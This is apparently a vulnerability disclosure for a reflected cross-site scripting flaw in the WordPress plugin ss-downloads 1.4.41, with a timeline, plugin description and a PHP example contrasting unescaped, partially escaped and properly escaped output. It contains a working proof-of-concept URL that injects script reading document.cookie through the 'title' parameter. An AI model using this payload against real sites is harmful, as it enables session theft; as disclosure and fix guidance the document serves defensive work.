wp-plugin : ss-downloads

Plugin Details
Plugin Name: wp-plugin : ss-downloads
Affected Version : 1.4.41 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wordpress/wp-content/wp-plugs/ss-downloads/templates/download.php?title=title%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Vulnerable Parameter : title
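
An illustration of the output-escaping fix for this class of bug, added here and not taken from the plugin's source. It assumes a template that echoes the title request value into a single-quoted attribute (the function names are hypothetical) and feeds it the decoded title value from the PoC URL.

```php
<?php
// Added example: hypothetical template fragment, not the plugin's actual code.
// Assumption: the template writes the "title" request value into a
// single-quoted HTML attribute, as the PoC's leading "title'>" suggests.

// Vulnerable pattern: request data concatenated into markup unescaped.
function render_unsafe(string $title): string {
    return "<input type='hidden' name='title' value='" . $title . "'>";
}

// Incomplete fix: ENT_COMPAT encodes < > & and " but leaves ' untouched, so
// the value can still close a single-quoted attribute. ENT_COMPAT was the
// default flag set of htmlspecialchars() before PHP 8.1.
function render_partial(string $title): string {
    return "<input type='hidden' name='title' value='"
        . htmlspecialchars($title, ENT_COMPAT, 'UTF-8') . "'>";
}

// Hardened: ENT_QUOTES also encodes ' so the value stays inside the attribute.
function render_safe(string $title): string {
    return "<input type='hidden' name='title' value='"
        . htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "'>";
}

// Templates are meant to be included by WordPress, not requested by URL.
// ABSPATH is defined once WordPress has loaded; if it is missing, the file
// was requested directly and a template can refuse to render.
function is_direct_request(): bool {
    return !defined('ABSPATH');
}

// Sample input: the title value from the PoC URL above, URL-decoded.
$title = urldecode('title%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E');

echo "unsafe : ", render_unsafe($title), PHP_EOL;
echo "partial: ", render_partial($title), PHP_EOL;
echo "safe   : ", render_safe($title), PHP_EOL;
echo "direct : ", is_direct_request() ? "yes, a template would exit here" : "no", PHP_EOL;
```

When the template runs inside WordPress, esc_attr() is the usual call for attribute context.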


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-21
Public Disclosure : May 28, 2014
CVE Number :
Plugin Description :
Adds a short code like [download file="path_to_file"] that embeds a form in the post asking for an email address before showing a link to a file for download. Great for promoting white papers and other digital assets on your site. Live demo: http://www.strangerstudios.com/blog/2010/07/ss-downloads-wordpress-plugin/

The plugin works in 3 parts.
1. The short code to add the form to your pages.
2. The logic to check (using session variables) if the user has provided an email address before showing either the email capture form or the download link.
3. A script to serve files securely. It checks for the same session variable before delivering the file. Files can be located outside the web directory or served from the uploads folder, etc., with an obfuscated URL.

The look of the email and download forms can be changed by copying files from the /css/ and /templates/ folder of the plugin into your active theme folder. Rename the files ssd-original_file_name.php/css (e.g. ssd-download.php or ssd-ss-downloads.css) and edit as needed.